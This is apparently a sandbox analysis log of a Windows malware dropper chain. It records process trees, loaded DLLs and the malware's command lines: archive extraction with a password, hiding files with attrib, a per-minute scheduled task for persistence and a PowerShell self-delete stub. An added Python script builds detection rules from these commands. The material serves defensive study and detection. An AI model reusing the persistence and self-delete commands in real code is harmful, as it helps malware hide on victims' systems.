Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe "C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe"
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe "C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe "C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe"
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe "C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe"
Source: unknown Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe "C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe"
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe "C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe "C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe "C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe "C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe "C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe "C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe "C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe"
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
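The process tree above is a complete dropper chain in a handful of command lines: 7z.exe extracting a password-protected archive from Temp, attrib hiding the payload, schtasks registering a task that reruns Intel_PTT_EK_Recertification.exe every minute from AppData\Roaming, a "powershell ping ...; del ..." stub that deletes the stage after a short delay, and explorer.exe spawned by that AppData binary (the explorer.exe instances later match the XMRig rules). The script below is an added detection example, not code from the report: it runs five rules over process-creation events and correlates hits per process tree. The command lines are the ones listed above; the PIDs/PPIDs, the event layout and the two-rule correlation threshold are constructed for the example.

```python
"""Added example, not code from the report: a small rule set run over
process-creation events rebuilt from the main.bat chain listed above.  The
command lines are the ones the report shows; PIDs/PPIDs are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # as logged by Sysmon event 1 / Security 4688


USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData)\\", re.I)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Each rule sees the event and its parent (None if the parent was not logged).
def protected_archive_extract(ev: Proc, parent: Optional[Proc]) -> bool:
    """7-Zip extracting with -p<password>, run from a user-writable directory."""
    t = ev.cmdline.split()
    return (_base(ev.image) in {"7z.exe", "7za.exe", "7zr.exe"} and len(t) > 1
            and t[1].lower() in {"e", "x"}
            and any(a.startswith("-p") and len(a) > 2 for a in t)
            and USER_WRITABLE.search(ev.image) is not None)


def hidden_executable(ev: Proc, parent: Optional[Proc]) -> bool:
    """attrib +H (optionally +S) applied to an .exe."""
    low = ev.cmdline.lower()
    return _base(ev.image) == "attrib.exe" and re.search(r"\+h\b", low) is not None and ".exe" in low


def scheduled_task_minute(ev: Proc, parent: Optional[Proc]) -> bool:
    """schtasks /CREATE ... /SC MINUTE whose action lives under AppData/Temp."""
    low = ev.cmdline.lower()
    return (_base(ev.image) == "schtasks.exe" and "/create" in low
            and re.search(r"/sc\s+minute", low) is not None
            and USER_WRITABLE.search(ev.cmdline) is not None)


def powershell_self_delete(ev: Proc, parent: Optional[Proc]) -> bool:
    """'powershell ping <x>; del <file>' delay-then-delete stub."""
    return (_base(ev.image) in {"powershell.exe", "pwsh.exe"}
            and re.search(r"ping\s+\S+\s*;\s*(del|remove-item|rm)\s", ev.cmdline.lower()) is not None)


def explorer_from_user_path(ev: Proc, parent: Optional[Proc]) -> bool:
    """explorer.exe started by a binary in AppData/Temp: an injection host."""
    return (_base(ev.image) == "explorer.exe" and parent is not None
            and USER_WRITABLE.search(parent.image) is not None)


RULES = [protected_archive_extract, hidden_executable, scheduled_task_minute,
         powershell_self_delete, explorer_from_user_path]


def evaluate(events: List[Proc]) -> List[Tuple[int, str]]:
    """(pid, rule name) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    return [(ev.pid, rule.__name__) for ev in events for rule in RULES
            if rule(ev, by_pid.get(ev.ppid))]


def suspicious_chains(events: List[Proc], min_rules: int = 2) -> Dict[int, List[str]]:
    """Group hits by the root of each process tree; report trees that trip at
    least min_rules distinct rules (the threshold is an assumption)."""
    by_pid = {e.pid: e for e in events}

    def root(pid: int) -> int:
        while by_pid[pid].ppid in by_pid:
            pid = by_pid[pid].ppid
        return pid

    per_root: Dict[int, Set[str]] = {}
    for pid, name in evaluate(events):
        per_root.setdefault(root(pid), set()).add(name)
    return {r: sorted(n) for r, n in per_root.items() if len(n) >= min_rules}


T = r"C:\Users\user\AppData\Local\Temp"
EVENTS = [  # constructed PIDs; command lines as listed in the report
    Proc(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(101, 100, r"C:\Users\user\Desktop\file.exe", r'"C:\Users\user\Desktop\file.exe"'),
    Proc(102, 101, T + r"\abc3bc1985\skotes.exe", '"' + T + r'\abc3bc1985\skotes.exe"'),
    Proc(103, 102, T + r"\1019315001\5f0a381314.exe", '"' + T + r'\1019315001\5f0a381314.exe"'),
    Proc(104, 103, r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""' + T + r'\main\main.bat" /S"'),
    Proc(106, 104, T + r"\main\7z.exe", "7z.exe e file.zip -p24291711423417250691697322505 -oextracted"),
    Proc(107, 104, T + r"\main\7z.exe", "7z.exe e extracted/file_7.zip -oextracted"),
    Proc(108, 104, r"C:\Windows\System32\attrib.exe", r'attrib +H "in.exe"'),
    Proc(109, 104, T + r"\main\in.exe", '"in.exe"'),
    Proc(110, 109, r"C:\Windows\System32\attrib.exe", r"attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe"),
    Proc(111, 109, r"C:\Windows\System32\schtasks.exe", r'schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE'),
    Proc(112, 109, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell ping 127.0.0.1; del in.exe"),
    Proc(114, 1, r"C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe", r"C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe"),
    Proc(115, 114, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(116, 114, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe"),
]

if __name__ == "__main__":
    for pid, name in evaluate(EVENTS):
        print(pid, name)
    print(suspicious_chains(EVENTS))
```

The second 7z.exe invocation (file_7.zip, no -p switch) deliberately does not fire, and the task-scheduler relaunch of Intel_PTT_EK_Recertification.exe (pid 114, no logged parent) forms its own tree, so the correlation step reports the original dropper tree and the persistence tree separately rather than one merged alert.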
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ureg.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
